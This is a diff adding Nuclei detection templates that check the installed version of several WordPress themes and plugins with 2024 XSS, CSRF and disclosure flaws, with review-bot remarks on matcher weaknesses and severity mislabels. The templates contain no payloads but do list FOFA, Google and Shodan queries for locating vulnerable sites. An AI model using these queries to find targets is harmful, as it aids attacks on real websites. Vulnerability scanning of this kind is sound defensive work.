+++ b/poc/cve/CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5867-c6c99bf3f91229f19ab5549c865f8aea + +info: + name: > + Delicate <= 3.5.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Button Shortcode + author: topscoder + severity: low + description: > + The Delicate theme for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' parameter within the theme's Button shortcode in all versions up to, and including, 3.5.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/dbf491d6-e546-4e3f-88c2-237b647a2b1e?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5867 + metadata: + fofa-query: "wp-content/themes/delicate/" + google-query: inurl:"/wp-content/themes/delicate/" + shodan-query: 'vuln:CVE-2024-5867' + tags: cve,wordpress,wp-theme,delicate,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/delicate/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "delicate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5869-611101c87cbed518f9857873a13fd418.yaml b/poc/cve/CVE-2024-5869-611101c87cbed518f9857873a13fd418.yaml new file mode 100644 index 0000000000..7f5d74e17a 
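Review bot: The `word` matcher depends on the single common English word `"delicate"` while `redirects: true` is set, so a site that answers a missing `style.css` path with a 200 landing page (soft 404) containing that word and any `Version: N.N` string would satisfy all three matchers; the Beauty (`"beauty"`, CVE-2024-5884) and Stream (`"stream"`, CVE-2024-7423) templates in this commit share the weakness. Requiring the file header alongside the slug narrows it, e.g. `words: ["Theme Name:", "delicate"]` with `condition: and` (for the readme-based Stream template, `"Stable tag:"` plays the same role). Alternatively, dropping `redirects: true` for a static asset path removes the soft-404 case entirely.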
--- /dev/null +++ b/poc/cve/CVE-2024-5869-611101c87cbed518f9857873a13fd418.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5869-611101c87cbed518f9857873a13fd418 + +info: + name: > + Neighborly <= 1.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via Button Shortcode + author: topscoder + severity: low + description: > + The Neighborly theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter within the theme's Button shortcode in all versions up to, and including, 1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f65834c6-6da7-4033-aa2a-a4926d6c955d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5869 + metadata: + fofa-query: "wp-content/themes/neighborly/" + google-query: inurl:"/wp-content/themes/neighborly/" + shodan-query: 'vuln:CVE-2024-5869' + tags: cve,wordpress,wp-theme,neighborly,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/neighborly/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "neighborly" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-5870-72d352e62d854d49b010539851855ac0.yaml b/poc/cve/CVE-2024-5870-72d352e62d854d49b010539851855ac0.yaml new file mode 100644 index 0000000000..6df7fe2023 --- /dev/null +++ b/poc/cve/CVE-2024-5870-72d352e62d854d49b010539851855ac0.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-5870-72d352e62d854d49b010539851855ac0 + +info: + name: > + Tweaker5 <= 1.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Button Shortcode + author: topscoder + severity: low + description: > + The Tweaker5 theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘url’ parameter within the theme's Button shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f70ba568-b013-4177-928a-eefb606333ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5870 + metadata: + fofa-query: "wp-content/themes/tweaker5/" + google-query: inurl:"/wp-content/themes/tweaker5/" + shodan-query: 'vuln:CVE-2024-5870' + tags: cve,wordpress,wp-theme,tweaker5,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/tweaker5/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tweaker5" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml b/poc/cve/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml new file mode 100644 index 0000000000..0345df64fa --- /dev/null 
+++ b/poc/cve/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e + +info: + name: > + Beauty <= 1.1.4 - Authenticated (Subscriber+) Stored Cross-Site Scripting via tpl_featured_cat_id Parameter + author: topscoder + severity: low + description: > + The Beauty theme for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘tpl_featured_cat_id’ parameter in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c1089958-a481-47b1-9dc6-799a1a7930c8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-5884 + metadata: + fofa-query: "wp-content/themes/beauty/" + google-query: inurl:"/wp-content/themes/beauty/" + shodan-query: 'vuln:CVE-2024-5884' + tags: cve,wordpress,wp-theme,beauty,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/beauty/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "beauty" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe.yaml b/poc/cve/CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe.yaml new file mode 100644 index 0000000000..78c7ce4bf2 --- /dev/null 
+++ b/poc/cve/CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6020-5176ea957ebdce07a35c57808b2e82fe + +info: + name: > + Sign-up Sheets <= 2.2.12 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Sign-up Sheets plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['REQUEST_URI'] without appropriate escaping on the URL in all versions up to, and including, 2.2.12. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba06e298-308d-4378-96b8-5ac4e7cc63c0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-6020 + metadata: + fofa-query: "wp-content/plugins/sign-up-sheets/" + google-query: inurl:"/wp-content/plugins/sign-up-sheets/" + shodan-query: 'vuln:CVE-2024-6020' + tags: cve,wordpress,wp-plugin,sign-up-sheets,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sign-up-sheets/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sign-up-sheets" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.12') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml b/poc/cve/CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml new file mode 100644 index 0000000000..bdd003de1e --- /dev/null 
+++ b/poc/cve/CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6544-e9fb2eb34b85b7537083daf3a92b49f4 + +info: + name: > + Custom Post Limits <= 4.4.1 - Unauthenticated Full Path Disclosure + author: topscoder + severity: medium + description: > + The Custom Post Limits plugin for WordPress is vulnerable to full path disclosure in all versions up to, and including, 4.4.1. This is due to the plugin utilizing bootstrap and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cf4a11e-ad28-4a93-9278-1d2d113a4859?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6544 + metadata: + fofa-query: "wp-content/plugins/custom-post-limits/" + google-query: inurl:"/wp-content/plugins/custom-post-limits/" + shodan-query: 'vuln:CVE-2024-6544' + tags: cve,wordpress,wp-plugin,custom-post-limits,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-post-limits/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-post-limits" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c.yaml b/poc/cve/CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c.yaml new file mode 100644 index 0000000000..64e33c38e6 --- /dev/null +++ b/poc/cve/CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-6792-caf9c03fac6a04307d723bd20d75de7c + +info: + name: > + WP ULike 4.7.1 - 4.7.2 - Authenticated (Subscriber+) Stored-Cross-Site Scripting + author: topscoder + severity: low + description: > + The WP ULike – The Ultimate Engagement Toolkit for Websites plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the first name field in versions 4.7.1 to 4.7.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7e7a289f-39ef-4961-bd08-34e6a7dfdac5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-6792 + metadata: + fofa-query: "wp-content/plugins/wp-ulike/" + google-query: inurl:"/wp-content/plugins/wp-ulike/" + shodan-query: 'vuln:CVE-2024-6792' + tags: cve,wordpress,wp-plugin,wp-ulike,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-ulike/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-ulike" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 4.7.1', '<= 4.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml b/poc/cve/CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml new file mode 100644 index 0000000000..656766bda4 --- /dev/null 
+++ b/poc/cve/CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-6846-a3b80ea88f57506dc9d9e2d910bbf04b + +info: + name: > + Chatbot with ChatGPT <= 2.4.4 - Missing Authorization + author: topscoder + severity: high + description: > + The Chatbot with ChatGPT WordPress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the wdgpt_purge_chat_logs and wdgpt_purge_error_logs functions in all versions up to, and including, 2.4.4. This makes it possible for unauthenticated attackers to purge logs. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/17b0366c-f170-420d-b0d5-5c2f9f9e1cca?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6846 + metadata: + fofa-query: "wp-content/plugins/smartsearchwp/" + google-query: inurl:"/wp-content/plugins/smartsearchwp/" + shodan-query: 'vuln:CVE-2024-6846' + tags: cve,wordpress,wp-plugin,smartsearchwp,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/smartsearchwp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "smartsearchwp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.4.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-6888-b452cc3f182752280bb057c3435438a7.yaml b/poc/cve/CVE-2024-6888-b452cc3f182752280bb057c3435438a7.yaml new file mode 100644 index 0000000000..0df9e414be --- /dev/null +++ b/poc/cve/CVE-2024-6888-b452cc3f182752280bb057c3435438a7.yaml 
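Review bot: `severity: high` (and the `high` tag) disagrees with the `cvss-score: 5.3` and `PR:N/UI:N/S:U/C:N/I:L/A:N` vector on the same template, which elsewhere in this commit (CVE-2024-6544, also 5.3) is labelled `medium`; the likely fix is `severity: medium` and `tags: cve,wordpress,wp-plugin,smartsearchwp,medium`. The Stream template (CVE-2024-7423) has the opposite mismatch, `cvss-score: 8.8` with `severity: medium`. Because `severity` drives nuclei filtering and report triage, these mislabels change which findings get surfaced.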
@@ -0,0 +1,59 @@ +id: CVE-2024-6888-b452cc3f182752280bb057c3435438a7 + +info: + name: > + Secure Copy Content Protection and Content Locking <= 4.1.6 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Custom CSS setting in all versions up to, and including, 4.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a621cd24-d012-40f0-bfac-29268751f772?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6888 + metadata: + fofa-query: "wp-content/plugins/secure-copy-content-protection/" + google-query: inurl:"/wp-content/plugins/secure-copy-content-protection/" + shodan-query: 'vuln:CVE-2024-6888' + tags: cve,wordpress,wp-plugin,secure-copy-content-protection,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/secure-copy-content-protection/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "secure-copy-content-protection" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.6') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml b/poc/cve/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml new file mode 100644 index 0000000000..349608c0e8 --- /dev/null +++ b/poc/cve/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e + +info: + name: > + Secure Copy Content Protection and Content Locking <= 4.1.6 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Secure Copy Content Protection and Content Locking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the "Custom class for tooltip container" field in all versions up to, and including, 4.1.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/25c35a42-9f1a-4f67-a074-c6359e8b1a41?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6889 + metadata: + fofa-query: "wp-content/plugins/secure-copy-content-protection/" + google-query: inurl:"/wp-content/plugins/secure-copy-content-protection/" + shodan-query: 'vuln:CVE-2024-6889' + tags: cve,wordpress,wp-plugin,secure-copy-content-protection,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/secure-copy-content-protection/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "secure-copy-content-protection" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.6') \ No newline at 
end of file diff --git a/poc/cve/CVE-2024-6910-579d75d9cc4716699d11831eae3d5143.yaml b/poc/cve/CVE-2024-6910-579d75d9cc4716699d11831eae3d5143.yaml new file mode 100644 index 0000000000..68f6155ec6 --- /dev/null +++ b/poc/cve/CVE-2024-6910-579d75d9cc4716699d11831eae3d5143.yaml 
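Review bot: This template's `name` is identical to the CVE-2024-6888 template's (`Secure Copy Content Protection and Content Locking <= 4.1.6 - Authenticated (Admin+) Stored Cross-Site Scripting`), and both use the same path, regex and `<= 4.1.6` bound, so they always fire together with indistinguishable titles. The description says this one is via the "Custom class for tooltip container" field while CVE-2024-6888 is via the Custom CSS setting; putting that in the title, e.g. `... Stored Cross-Site Scripting via Tooltip Container Class Field`, lets the two findings be told apart in output.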
@@ -0,0 +1,59 @@ +id: CVE-2024-6910-579d75d9cc4716699d11831eae3d5143 + +info: + name: > + EventON <= 2.2.16 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The EventON plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.2.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/272746cd-0817-4dcb-8a4c-f1d84ed960b2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-6910 + metadata: + fofa-query: "wp-content/plugins/eventon-lite/" + google-query: inurl:"/wp-content/plugins/eventon-lite/" + shodan-query: 'vuln:CVE-2024-6910' + tags: cve,wordpress,wp-plugin,eventon-lite,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eventon-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eventon-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.16') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516.yaml b/poc/cve/CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516.yaml new file mode 100644 index 0000000000..0fa2812ce7 --- /dev/null +++ b/poc/cve/CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7132-a80035d85237acc3ef439cd2cd18c516 + +info: + name: > + Page Builder Gutenberg Blocks – CoBlocks <= 3.1.12 - Authenticated (Editor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Page Builder Gutenberg Blocks – CoBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post settings in all versions up to, and including, 3.1.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ef54b45e-19e4-4423-aace-99b017cdd6ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-7132 + metadata: + fofa-query: "wp-content/plugins/coblocks/" + google-query: inurl:"/wp-content/plugins/coblocks/" + shodan-query: 'vuln:CVE-2024-7132' + tags: cve,wordpress,wp-plugin,coblocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "coblocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.12') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml b/poc/cve/CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml new file mode 100644 index 0000000000..b7cbc6d242 --- /dev/null +++ b/poc/cve/CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-7354-d12966f5f3ae3670ae8b5bd2b022ab06 + +info: + name: > + Ninja Forms – The Contact Form Builder That Grows With You <= 3.8.10 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Ninja Forms – The Contact Form Builder That Grows With You plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in versions 3.8.6 to 3.8.10. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5f7dc2c7-1a23-4677-b331-951960e76d43?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-7354 + metadata: + fofa-query: "wp-content/plugins/ninja-forms/" + google-query: inurl:"/wp-content/plugins/ninja-forms/" + shodan-query: 'vuln:CVE-2024-7354' + tags: cve,wordpress,wp-plugin,ninja-forms,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ninja-forms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '>= 3.8.6', '<= 3.8.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-7423-beef10a23166777228f21f82780dd30d.yaml b/poc/cve/CVE-2024-7423-beef10a23166777228f21f82780dd30d.yaml new file mode 100644 index 0000000000..ae707b940d --- /dev/null 
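Review bot: The `name` states `<= 3.8.10`, but the description and the `compare_versions(version, '>= 3.8.6', '<= 3.8.10')` matcher bound the affected range at 3.8.6, so the title overstates the range; the WP ULike template in this commit (CVE-2024-6792) uses the `4.7.1 - 4.7.2` form for the same situation. Suggest `Ninja Forms – The Contact Form Builder That Grows With You 3.8.6 - 3.8.10 - Reflected Cross-Site Scripting`.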
+++ b/poc/cve/CVE-2024-7423-beef10a23166777228f21f82780dd30d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-7423-beef10a23166777228f21f82780dd30d + +info: + name: > + Stream <= 4.0.1 - Cross-Site Request Forgery to Arbitrary Options Update + author: topscoder + severity: medium + description: > + The Stream plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.0.1. This is due to missing or incorrect nonce validation on the network_options_action() function. This makes it possible for unauthenticated attackers to update arbitrary options that can lead to DoS or privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/9d15e418-36bb-4f53-ac67-8f6122591dd2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-7423 + metadata: + fofa-query: "wp-content/plugins/stream/" + google-query: inurl:"/wp-content/plugins/stream/" + shodan-query: 'vuln:CVE-2024-7423' + tags: cve,wordpress,wp-plugin,stream,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/stream/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "stream" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.1') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa.yaml b/poc/cve/CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa.yaml new file mode 100644 index 0000000000..6fc664320c --- /dev/null +++ b/poc/cve/CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-7716-2ebb70230dde389a8f6f5a9c0160affa
+
+info:
+ name: >
+ Logo Slider – Logo Showcase, Logo Carousel, Logo Gallery and Client Logo Presentation <= 3.6.8 - Authenticated (Admin+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
